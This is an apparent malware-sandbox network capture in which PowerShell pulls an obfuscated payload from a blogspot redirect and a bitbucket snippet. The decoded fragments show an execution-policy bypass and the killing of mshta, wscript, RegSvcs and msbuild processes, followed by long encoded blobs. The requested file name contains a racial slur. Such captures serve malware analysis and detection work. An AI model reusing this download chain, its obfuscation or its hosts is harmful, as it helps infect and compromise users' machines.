"endpoint-1"} Server-Timing: atl-edge;dur=97,atl-edge-internal;dur=5,atl-edge-upstream;dur=93,atl-edge-pop;desc="aws-eu-central-1" Connection: close
2025-01-08 12:55:20 UTC	11536	IN	Data Raw: 26 20 28 5b 63 68 61 72 5b 5d 5d 28 38 33 2c 31 30 31 2c 31 31 36 2c 34 35 2c 36 39 2c 31 32 30 2c 31 30 31 2c 39 39 2c 31 31 37 2c 31 31 36 2c 31 30 35 2c 31 31 31 2c 31 31 30 2c 38 30 2c 31 31 31 2c 31 30 38 2c 31 30 35 2c 39 39 2c 31 32 31 29 20 2d 6a 6f 69 6e 20 27 27 29 20 60 0a 2d 53 63 6f 70 65 20 43 75 72 72 65 6e 74 55 73 65 72 20 42 79 70 61 73 73 20 2d 46 6f 72 63 65 0a 0a 40 28 22 52 65 67 53 76 63 73 22 2c 20 22 6d 73 68 74 61 22 2c 20 22 77 73 63 72 69 70 74 22 2c 20 22 6d 73 62 75 69 6c 64 22 29 20 7c 20 46 6f 72 45 61 63 68 2d 4f 62 6a 65 63 74 20 7b 0a 20 20 20 20 47 65 74 2d 50 72 6f 63 65 73 73 20 2d 4e 61 6d 65 20 24 5f 20 2d 45 72 72 6f 72 41 63 74 69 6f 6e 20 53 69 6c 65 6e 74 6c 79 43 6f 6e 74 69 6e 75 65 20 7c 20 53 74 6f 70 2d 50 Data Ascii: & ([char[]](83,101,116,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121) -join '') `-Scope CurrentUser Bypass -Force@("RegSvcs", "mshta", "wscript", "msbuild") \| ForEach-Object { Get-Process -Name $_ -ErrorAction SilentlyContinue \| Stop-P
2025-01-08 12:55:20 UTC	16384	IN	Data Raw: 30 31 31 34 32 31 32 30 36 36 33 32 33 31 31 37 33 33 30 32 34 31 33 30 36 32 30 34 32 35 35 31 32 34 32 34 31 31 36 33 32 31 32 33 33 30 32 32 32 33 36 32 33 31 34 32 31 32 31 37 32 32 31 35 32 37 36 30 31 32 32 32 36 33 34 30 33 33 30 30 35 34 30 37 30 33 35 32 31 31 32 31 31 31 31 32 36 31 35 37 30 31 30 33 33 36 32 31 31 31 36 30 30 35 36 30 36 30 32 36 30 33 30 30 30 31 30 30 32 30 30 32 30 32 32 30 30 32 31 30 32 30 30 32 30 32 30 36 30 30 30 30 37 31 30 32 30 30 32 30 32 33 30 30 30 30 30 35 30 30 31 30 30 31 30 30 31 30 30 35 31 30 37 36 33 36 30 32 30 31 31 36 30 32 32 35 30 31 31 30 36 30 30 35 31 30 30 36 30 32 34 30 32 30 30 32 30 32 30 36 30 31 30 31 33 30 31 30 34 30 37 34 31 36 35 31 31 35 31 30 36 31 35 35 31 31 34 31 34 36 31 33 32 31 35 Data Ascii: 011421206632311733024130620425512424116321233022236231421217221527601222634033005407035211211112615701033621116005606026030001002002022002102002020600007102002023000005001001001005107636020116022501106005100602402002020601013010407416511510615511414613215
2025-01-08 12:55:20 UTC	6312	IN	Data Raw: 33 31 34 33 31 36 31 33 37 33 30 35 32 33 32 33 31 33 33 37 30 31 31 34 30 37 35 33 31 32 31 35 35 31 33 30 30 36 30 32 32 35 33 33 36 33 36 37 31 31 37 33 30 30 30 37 34 31 36 33 31 31 33 31 37 30 30 33 36 33 31 37 31 37 34 32 34 37 32 32 36 33 31 31 31 30 30 30 31 30 30 32 30 30 32 30 32 33 30 30 30 30 30 35 30 30 33 31 30 31 30 30 31 30 30 35 31 30 37 36 33 36 30 32 30 31 31 36 30 32 32 35 30 31 31 30 36 30 30 35 31 30 30 36 30 31 30 30 34 30 30 31 30 30 34 31 30 31 30 32 37 34 31 36 30 30 36 30 30 30 31 30 30 36 30 33 30 30 31 30 30 34 31 30 31 30 32 37 34 31 35 30 30 36 30 30 37 30 30 30 36 30 33 32 30 30 36 30 35 32 30 34 30 30 30 34 30 35 33 30 35 32 31 33 30 30 36 30 30 34 33 30 30 36 30 34 35 31 32 36 31 33 34 31 36 35 30 34 36 30 37 30 31 34 36 Data Ascii: 314316137305232313370114075312155130060225336367117300074163113170036317174247226311100010020020230000050031010010051076360201160225011060051006010040010041010274160060001006030010041010274150060070006032006052040004053052130060043006045126134165046070146
2025-01-08 12:55:20 UTC	16384	IN	Data Raw: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 31 30 35 31 30 36 37 30 31 37 31 34 35 31 32 34 31 35 35 31 35 34 31 33 36 31 33 36 31 31 34 31 37 35 30 34 37 30 32 31 30 35 31 30 36 37 30 37 35 31 36 34 31 36 35 31 31 31 31 34 36 31 33 36 31 35 36 31 32 36 31 34 36 31 37 35 30 34 37 30 30 34 30 30 34 30 32 31 Data Ascii: 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000021051067017145124155154136136114175047021051067075164165111146136156126146175047004004021
2025-01-08 12:55:20 UTC	16384	IN	Data Raw: 37 37 33 37 37 33 37 37 33 32 37 33 37 37 33 37 37 33 37 37 33 32 37 33 37 37 33 37 37 33 37 37 33 32 37 33 37 37 33 37 37 33 37 37 33 32 37 33 37 37 33 37 37 33 37 37 33 32 37 33 37 37 33 37 37 33 37 37 33 32 37 33 37 37 33 37 37 33 37 37 33 32 37 33 37 37 33 37 37 33 37 37 33 32 37 33 37 37 33 37 37 33 37 37 33 32 37 33 37 37 33 37 37 33 37 37 33 32 37 33 37 37 33 37 37 33 37 37 33 32 37 33 37 37 33 37 37 33 37 37 33 32 37 33 37 37 33 37 37 33 37 37 33 32 37 33 37 37 33 37 37 33 37 37 33 32 37 33 37 37 33 37 37 33 37 37 33 32 37 33 37 37 33 37 37 33 37 37 33 32 37 33 37 37 33 37 37 33 37 37 33 33 37 33 37 37 33 37 37 33 37 37 33 33 37 33 37 37 33 37 37 33 37 37 33 31 37 33 37 37 33 37 37 33 37 37 33 32 37 33 37 37 33 37 37 33 37 37 33 35 37 33 37 37 33 Data Ascii: 773773773273773773773273773773773273773773773273773773773273773773773273773773773273773773773273773773773273773773773273773773773273773773773273773773773273773773773273773773773273773773773273773773773373773773773373773773773173773773773273773773773573773
2025-01-08 12:55:20 UTC	16384	IN	Data Raw: 37 33 37 37 33 31 37 33 37 37 33 37 37 33 37 37 33 31 37 33 37 37 33 37 37 33 37 37 33 31 37 33 37 37 33 37 37 33 37 37 33 31 37 33 37 37 33 37 37 33 37 37 33 31 37 33 37 37 33 37 37 33 37 37 33 37 37 33 37 37 33 37 37 33 37 37 33 31 37 33 37 37 33 37 37 33 37 37 33 31 37 33 37 37 33 37 37 33 37 37 33 37 37 33 37 37 33 37 37 33 37 37 33 37 37 33 37 37 33 37 37 33 37 37 33 37 37 33 37 37 33 30 32 30 37 34 31 34 30 33 30 33 30 30 30 30 30 30 30 30 30 30 37 34 32 30 30 30 30 30 30 30 30 30 37 37 33 31 32 30 37 34 31 34 30 33 37 37 33 37 37 33 37 37 33 37 37 33 37 37 33 37 37 33 37 37 33 37 37 33 37 37 33 37 37 33 37 37 33 37 37 33 37 37 33 37 37 33 37 37 33 31 37 33 37 37 33 37 37 33 37 37 33 31 37 33 37 37 33 37 37 33 37 37 33 31 37 33 37 37 33 37 37 33 37 Data Ascii: 737731737737737731737737737731737737737731737737737731737737737737737737737731737737737731737737737737737737737737737737737737737730207414030300000000007420000000007731207414037737737737737737737737737737737737737737737731737737737731737737737731737737737
2025-01-08 12:55:20 UTC	16384	IN	Data Raw: 30 30 35 30 37 36 32 32 30 30 37 37 33 37 37 33 31 36 32 30 36 32 37 37 33 37 37 33 30 36 32 30 36 32 31 30 30 30 30 30 30 36 32 30 36 32 30 30 30 30 30 30 30 36 32 30 36 32 30 30 30 30 30 30 30 36 32 30 36 32 30 30 30 30 30 30 31 36 32 31 36 32 30 30 30 30 30 30 33 36 32 36 36 32 30 30 30 30 30 30 37 36 32 32 30 30 30 30 30 30 30 30 32 36 32 30 36 32 30 30 30 30 30 30 30 36 32 30 36 32 30 30 30 30 30 30 30 36 32 30 36 32 30 30 30 30 30 30 30 36 32 30 36 32 30 30 30 30 30 30 30 36 32 30 36 32 30 30 30 30 30 30 30 36 32 30 36 32 30 30 30 30 30 32 32 36 32 36 36 32 37 37 33 37 37 33 30 32 31 30 32 31 30 32 31 30 32 31 30 32 31 30 32 31 30 32 31 30 32 31 30 32 31 30 32 31 30 32 31 30 32 31 30 32 31 30 32 31 30 32 31 30 32 31 30 32 31 30 32 31 30 32 31 30 32 Data Ascii: 005076220077377316206277377306206210000006206200000006206200000006206200000016216200000036266200000076220000000026206200000006206200000006206200000006206200000006206200000006206200000226266277377302102102102102102102102102102102102102102102102102102102102
2025-01-08 12:55:20 UTC	16384	IN	Data Raw: 34 35 32 34 35 32 34 35 32 34 35 32 34 35 32 34 35 32 34 35 32 34 35 32 30 36 32 30 36 32 30 36 32 30 34 30 37 37 32 36 37 32 31 34 30 36 35 32 34 35 32 34 35 32 34 35 32 34 35 32 34 35 32 34 35 32 34 35 32 34 35 32 34 35 32 34 35 32 34 35 32 34 35 32 34 35 32 34 35 32 34 35 32 34 35 32 34 35 32 34 35 32 34 35 32 34 35 32 34 35 32 34 35 32 34 35 32 34 35 32 34 35 32 34 35 32 34 35 32 34 35 32 34 35 32 34 35 32 34 35 32 34 35 32 34 35 32 34 35 32 34 35 32 34 35 32 34 35 32 34 35 32 34 35 32 34 35 32 30 36 32 37 35 32 30 36 32 31 33 30 37 37 32 36 37 32 33 33 30 36 35 32 34 35 32 34 35 32 34 35 32 34 35 32 34 35 32 34 35 32 34 35 32 34 35 32 34 35 32 34 35 32 34 35 32 34 35 32 34 35 32 34 35 32 34 35 32 34 35 32 34 35 32 34 35 32 34 35 32 34 35 32 34 35 32 Data Ascii: 452452452452452452452452062062062040772672140652452452452452452452452452452452452452452452452452452452452452452452452452452452452452452452452452452452452452452452452452062752062130772672330652452452452452452452452452452452452452452452452452452452452452452
2025-01-08 12:55:20 UTC	16384	IN	Data Raw: 31 33 32 35 30 34 34 30 30 32 32 37 32 31 33 35 33 31 35 31 35 34 30 34 36 33 35 32 31 32 37 31 33 31 33 32 30 30 30 32 32 32 35 31 33 36 31 31 33 30 34 34 33 31 36 31 35 30 33 37 34 33 33 35 31 36 33 33 35 37 33 30 31 33 34 36 32 35 34 30 37 37 33 35 34 30 37 34 31 33 37 33 30 35 30 31 31 31 37 33 32 34 30 33 36 35 31 35 30 30 34 30 30 33 35 32 30 35 31 35 34 30 37 32 31 36 35 33 35 37 33 33 33 31 35 33 30 32 32 33 37 33 33 32 37 30 34 30 30 33 36 31 32 34 32 30 31 31 34 34 30 36 31 30 35 35 30 33 30 30 33 30 33 35 31 30 37 33 31 37 30 33 36 35 31 35 31 32 33 37 30 30 33 31 36 35 32 37 31 30 37 37 33 37 35 31 30 30 33 34 37 33 36 33 33 32 37 32 35 31 32 33 35 33 34 31 32 33 31 31 37 36 32 36 36 30 35 32 33 34 32 30 31 31 30 32 30 30 36 34 31 31 37 30 35 Data Ascii: 132504400227213531515404635212713132000222513611304431615037433516335730134625407735407413730501117324036515004003520515407216535733315302237332704003612420114406105503003035107317036515123700316527107737510034736332725123534123117626605234201102006411705
2025-01-08 12:55:20 UTC	16384	IN	Data Raw: 30 30 31 30 30 31 30 30 31 30 30 31 30 30 31 30 30 31 30 30 31 30 30 31 30 30 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 36 30 30 31 30 30 31 30 30 31 30 30 31 30 30 31 30 30 31 30 30 31 30 30 31 30 30 31 30 30 31 30 30 31 30 30 31 30 30 31 30 30 31 30 30 31 30 30 37 30 30 37 30 30 37 30 30 31 37 31 33 34 31 36 35 31 35 34 31 32 36 31 32 36 31 35 36 31 33 30 31 33 36 31 31 30 31 35 34 31 33 36 31 32 36 31 31 34 31 30 32 31 32 36 31 37 35 31 36 30 31 34 34 31 31 35 31 34 35 31 31 34 31 36 36 31 37 32 30 32 36 31 35 34 31 32 34 31 35 35 31 35 36 31 36 31 31 33 36 31 31 30 31 35 34 31 33 36 31 32 36 31 31 34 31 30 32 31 32 36 31 37 35 31 36 30 31 34 34 31 31 35 Data Ascii: 001001001001001001001001001000000000000000000000000000000000000000000000060010010010010010010010010010010010010010010010070070070017134165154126126156130136110154136126114102126175160144115145114166172026154124155156161136110154136126114102126175160144115

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49945	142.250.185.225	443	6888	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 12:55:31 UTC	181	OUT	GET ///////nigger.pdf HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: hot7jan.blogspot.com Connection: Keep-Alive
2025-01-08 12:55:31 UTC	467	IN	HTTP/1.1 302 Moved Temporarily X-Robots-Tag: noindex, nofollow Content-Type: text/html; charset=UTF-8 Location: /atom.xml Date: Wed, 08 Jan 2025 12:55:31 GMT Expires: Wed, 08 Jan 2025 12:55:31 GMT Cache-Control: private, max-age=0 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Server: GSE Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2025-01-08 12:55:31 UTC	224	IN	Data Raw: 64 61 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 21 2d 2d 20 47 53 45 20 44 65 66 61 75 6c 74 20 45 72 72 6f 72 20 2d 2d 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 2f 61 74 6f 6d 2e 78 6d 6c 22 3e 68 65 72 65 3c 2f 41 3e 2e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0d 0a Data Ascii: da<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000">... GSE Default Error --><H1>Moved Temporarily</H1>The document has moved <A HREF="/atom.xml">here</A>.</BODY></HTML>
2025-01-08 12:55:31 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49956	142.250.185.225	443	6888	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 12:55:32 UTC	149	OUT	GET /atom.xml HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: hot7jan.blogspot.com
2025-01-08 12:55:33 UTC	661	IN	HTTP/1.1 302 Found Cross-Origin-Resource-Policy: cross-origin ETag: W/"cd616d4f42d33423013649c829d2cedd94e52524f5a4c87a10a07a567a5ed829" Date: Wed, 08 Jan 2025 12:55:32 GMT Content-Type: text/html; charset=UTF-8 Server: blogger-renderd Expires: Wed, 08 Jan 2025 12:55:33 GMT Cache-Control: public, must-revalidate, proxy-revalidate, max-age=1 X-Content-Type-Options: nosniff X-XSS-Protection: 0 Location: https://bitbucket.org/!api/2.0/snippets/nippleskakulcha/xq8pnq/f9259294d6c36acaa3a405307dfd0b2eee933c4b/files/7jan.txt Content-Length: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49964	185.166.143.48	443	6888	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 12:55:33 UTC	254	OUT	GET /!api/2.0/snippets/nippleskakulcha/xq8pnq/f9259294d6c36acaa3a405307dfd0b2eee933c4b/files/7jan.txt HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: bitbucket.org Connection: Keep-Alive
2025-01-08 12:55:34 UTC	4852	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 12:55:34 GMT Content-Type: text/plain Content-Length: 4951516 Server: AtlassianEdge Cache-Control: s-maxage=900, max-age=900 Etag: "b21f207101abbbb84b30dfffb68c53e5" Expires: Thu, 08 Jan 2026 12:54:24 GMT Vary: Authorization, Accept-Language, Origin, Accept-Encoding X-View-Name: bitbucket.apps.snippets.api.v20.commits.SnippetFileHandler X-Used-Mesh: False X-Dc-Location: Micros-3 X-Served-By: 033bf81711a5 X-Version: d08b93e25c14 X-Static-Version: d08b93e25c14 X-Request-Count: 3720 X-Render-Time: 0.25580692291259766 X-B3-Traceid: 73c224192224418ebfe5440872e41838 X-B3-Spanid: ae12080db0e1df43 X-Frame-Options: SAMEORIGIN Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public [TRUNCATED] X-Usage-Quota-Remaining: 963999.387 X-Usage-Request-Cost: 36072.43 X-Usage-User-Time: 0.211716 X-Usage-System-Time: 0.010457 X-Usage-Input-Ops: 3440 X-Usage-Output-Ops: 0 X-Accepted-Oauth-Scopes: snippet Content-Language: en Age: 69 Accept-Ranges: bytes X-Cache: HIT X-Content-Type-Options: nosniff X-Xss-Protection: 1; mode=block Atl-Traceid: 6cae8a9c0cac4b6191668c733642a0d3 Atl-Request-Id: 6cae8a9c-0cac-4b61-9166-8c733642a0d3 Strict-Transport-Security: max-age=63072000; includeSubDomains; preload Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600} Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"} Server-Timing: atl-edge;dur=94,atl-edge-internal;dur=4,atl-edge-upstream;dur=91,atl-edge-pop;desc="aws-eu-central-1" Connection: close
2025-01-08 12:55:34 UTC	11532	IN	Data Raw: 26 20 28 5b 63 68 61 72 5b 5d 5d 28 38 33 2c 31 30 31 2c 31 31 36 2c 34 35 2c 36 39 2c 31 32 30 2c 31 30 31 2c 39 39 2c 31 31 37 2c 31 31 36 2c 31 30 35 2c 31 31 31 2c 31 31 30 2c 38 30 2c 31 31 31 2c 31 30 38 2c 31 30 35 2c 39 39 2c 31 32 31 29 20 2d 6a 6f 69 6e 20 27 27 29 20 60 0a 2d 53 63 6f 70 65 20 43 75 72 72 65 6e 74 55 73 65 72 20 42 79 70 61 73 73 20 2d 46 6f 72 63 65 0a 0a 40 28 22 52 65 67 53 76 63 73 22 2c 20 22 6d 73 68 74 61 22 2c 20 22 77 73 63 72 69 70 74 22 2c 20 22 6d 73 62 75 69 6c 64 22 29 20 7c 20 46 6f 72 45 61 63 68 2d 4f 62 6a 65 63 74 20 7b 0a 20 20 20 20 47 65 74 2d 50 72 6f 63 65 73 73 20 2d 4e 61 6d 65 20 24 5f 20 2d 45 72 72 6f 72 41 63 74 69 6f 6e 20 53 69 6c 65 6e 74 6c 79 43 6f 6e 74 69 6e 75 65 20 7c 20 53 74 6f 70 2d 50 Data Ascii: & ([char[]](83,101,116,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121) -join '') `-Scope CurrentUser Bypass -Force@("RegSvcs", "mshta", "wscript", "msbuild") \| ForEach-Object { Get-Process -Name $_ -ErrorAction SilentlyContinue \| Stop-P
2025-01-08 12:55:34 UTC	16384	IN	Data Raw: 35 32 30 34 30 31 31 34 32 31 32 30 36 36 33 32 33 31 31 37 33 33 30 32 34 31 33 30 36 32 30 34 32 35 35 31 32 34 32 34 31 31 36 33 32 31 32 33 33 30 32 32 32 33 36 32 33 31 34 32 31 32 31 37 32 32 31 35 32 37 36 30 31 32 32 32 36 33 34 30 33 33 30 30 35 34 30 37 30 33 35 32 31 31 32 31 31 31 31 32 36 31 35 37 30 31 30 33 33 36 32 31 31 31 36 30 30 35 36 30 36 30 32 36 30 33 30 30 30 31 30 30 32 30 30 32 30 32 32 30 30 32 31 30 32 30 30 32 30 32 30 36 30 30 30 30 37 31 30 32 30 30 32 30 32 33 30 30 30 30 30 35 30 30 31 30 30 31 30 30 31 30 30 35 31 30 37 36 33 36 30 32 30 31 31 36 30 32 32 35 30 31 31 30 36 30 30 35 31 30 30 36 30 32 34 30 32 30 30 32 30 32 30 36 30 31 30 31 33 30 31 30 34 30 37 34 31 36 35 31 31 35 31 30 36 31 35 35 31 31 34 31 34 36 31 Data Ascii: 520401142120663231173302413062042551242411632123302223623142121722152760122263403300540703521121111261570103362111600560602603000100200202200210200202060000710200202300000500100100100510763602011602250110600510060240200202060101301040741651151061551141461
2025-01-08 12:55:34 UTC	16384	IN	Data Raw: 37 32 34 37 33 31 34 33 31 36 31 33 37 33 30 35 32 33 32 33 31 33 33 37 30 31 31 34 30 37 35 33 31 32 31 35 35 31 33 30 30 36 30 32 32 35 33 33 36 33 36 37 31 31 37 33 30 30 30 37 34 31 36 33 31 31 33 31 37 30 30 33 36 33 31 37 31 37 34 32 34 37 32 32 36 33 31 31 31 30 30 30 31 30 30 32 30 30 32 30 32 33 30 30 30 30 30 35 30 30 33 31 30 31 30 30 31 30 30 35 31 30 37 36 33 36 30 32 30 31 31 36 30 32 32 35 30 31 31 30 36 30 30 35 31 30 30 36 30 31 30 30 34 30 30 31 30 30 34 31 30 31 30 32 37 34 31 36 30 30 36 30 30 30 31 30 30 36 30 33 30 30 31 30 30 34 31 30 31 30 32 37 34 31 35 30 30 36 30 30 37 30 30 30 36 30 33 32 30 30 36 30 35 32 30 34 30 30 30 34 30 35 33 30 35 32 31 33 30 30 36 30 30 34 33 30 30 36 30 34 35 31 32 36 31 33 34 31 36 35 30 34 36 30 37 Data Ascii: 724731431613730523231337011407531215513006022533636711730007416311317003631717424722631110001002002023000005003101001005107636020116022501106005100601004001004101027416006000100603001004101027415006007000603200605204000405305213006004300604512613416504607
2025-01-08 12:55:34 UTC	16384	IN	Data Raw: 31 30 32 33 37 37 33 30 30 30 36 35 31 31 32 33 37 37 33 30 30 30 33 35 31 31 32 33 37 37 33 30 30 30 35 35 31 32 32 33 37 37 33 30 30 30 33 35 31 33 31 33 37 37 33 30 30 30 36 34 31 36 37 32 34 34 30 30 30 30 30 30 30 30 30 30 36 35 32 36 32 30 36 32 30 36 32 30 37 37 33 30 30 30 31 33 31 32 37 32 37 37 33 30 30 30 33 31 31 30 34 32 37 37 33 36 31 30 31 31 31 31 31 32 37 37 33 30 30 30 32 30 31 30 34 32 37 37 33 30 30 30 31 31 31 36 34 32 37 37 33 30 30 30 32 31 31 36 34 32 37 37 33 30 30 30 30 30 31 35 33 32 37 37 33 30 30 30 33 32 31 32 35 32 37 37 33 30 30 30 31 31 31 34 34 32 37 37 33 30 30 30 33 30 31 36 33 32 37 37 33 30 30 30 35 30 31 37 33 32 37 37 33 30 30 30 35 30 31 37 33 32 37 37 33 30 30 30 35 30 31 37 33 32 37 37 33 30 30 30 34 30 31 37 33 Data Ascii: 102377300065112377300035112377300055122377300035131377300064167244000000000065262062062077300013127277300031104277361011111277300020104277300011164277300021164277300000153277300032125277300011144277300030163277300050173277300050173277300050173277300040173
2025-01-08 12:55:34 UTC	16384	IN	Data Raw: 37 37 33 30 30 30 32 34 31 31 37 32 37 37 33 31 30 30 32 34 31 30 37 32 37 37 33 31 30 30 33 34 31 30 37 32 37 37 33 30 30 30 32 34 31 31 37 32 37 37 33 30 30 30 33 34 31 31 37 32 37 37 33 31 30 30 32 34 31 31 37 32 37 37 33 31 30 30 33 34 31 31 37 32 37 37 33 31 30 30 35 34 31 34 37 32 37 37 33 30 30 30 36 34 31 35 37 32 37 37 33 32 30 30 35 34 31 34 37 32 31 33 30 30 30 30 30 30 30 30 30 30 32 35 32 34 31 30 34 31 30 34 31 30 37 37 33 31 33 30 34 36 31 34 30 33 37 37 33 35 30 30 32 34 31 35 36 32 37 37 33 32 30 30 35 33 31 35 35 32 37 37 33 32 30 30 34 33 31 33 35 32 37 37 33 32 30 30 33 33 31 32 35 32 37 37 33 31 30 30 33 33 31 32 35 32 37 37 33 31 30 30 33 33 31 32 35 32 37 37 33 32 30 30 33 33 31 32 35 32 37 37 33 32 30 30 33 33 31 32 35 32 37 37 33 Data Ascii: 773000241172773100241072773100341072773000241172773000341172773100241172773100341172773100541472773000641572773200541472130000000000252410410410773130461403773500241562773200531552773200431352773200331252773100331252773100331252773200331252773200331252773
2025-01-08 12:55:34 UTC	16384	IN	Data Raw: 37 33 37 37 33 31 37 33 37 37 33 37 37 33 37 37 33 31 37 33 37 37 33 37 37 33 37 37 33 31 37 33 37 37 33 37 37 33 37 37 33 31 37 33 37 37 33 37 37 33 37 37 33 31 37 33 37 37 33 37 37 33 37 37 33 31 37 33 37 37 33 37 37 33 37 37 33 31 37 33 37 37 33 37 37 33 37 37 33 31 37 33 37 37 33 37 37 33 37 37 33 31 37 33 37 37 33 37 37 33 37 37 33 31 37 33 37 37 33 37 37 33 37 37 33 31 37 33 37 37 33 37 37 33 37 37 33 31 37 33 37 37 33 37 37 33 37 37 33 31 37 33 37 37 33 37 37 33 37 37 33 31 37 33 37 37 33 37 37 33 37 37 33 31 37 33 37 37 33 37 37 33 37 37 33 31 37 33 37 37 33 37 37 33 37 37 33 31 37 33 37 37 33 37 37 33 37 37 33 31 37 33 37 37 33 37 37 33 37 37 33 31 37 33 37 37 33 37 37 33 37 37 33 31 37 33 37 37 33 37 37 33 37 37 33 31 37 33 37 37 33 37 37 33 37 Data Ascii: 737731737737737731737737737731737737737731737737737731737737737731737737737731737737737731737737737731737737737731737737737731737737737731737737737731737737737731737737737731737737737731737737737731737737737731737737737731737737737731737737737731737737737
2025-01-08 12:55:34 UTC	16384	IN	Data Raw: 31 31 35 32 30 30 30 37 31 31 34 32 31 33 33 31 30 30 30 33 36 31 37 32 32 31 31 33 30 30 30 36 35 31 37 32 32 36 31 33 30 30 30 36 37 30 36 34 31 34 33 32 30 30 30 36 36 30 34 35 31 37 36 32 30 30 30 35 36 30 36 35 31 33 37 32 30 30 30 30 30 30 33 30 31 36 33 32 30 30 30 30 30 30 35 30 31 37 33 32 30 30 30 30 30 30 34 30 31 37 33 32 30 30 30 30 30 30 33 30 31 37 33 32 30 30 30 30 30 30 35 30 31 30 34 32 30 30 30 30 30 30 36 30 31 32 34 32 30 30 30 35 33 31 37 33 31 32 34 31 30 30 30 37 31 31 33 32 31 31 33 31 30 30 30 32 36 31 35 32 32 32 31 33 30 30 30 31 36 31 36 32 32 34 31 33 30 30 30 37 36 30 31 35 31 35 36 32 30 30 30 30 30 30 30 30 31 35 33 32 30 30 30 30 30 30 32 30 31 30 34 32 30 30 30 32 37 31 37 32 32 37 30 33 30 30 30 33 36 31 34 32 32 30 31 Data Ascii: 115200071142133100036172211300065172261300067064143200066045176200056065137200000030163200000050173200000040173200000030173200000050104200000060124200053173124100071132113100026152221300016162241300076015156200000000153200000020104200027172270300036142201
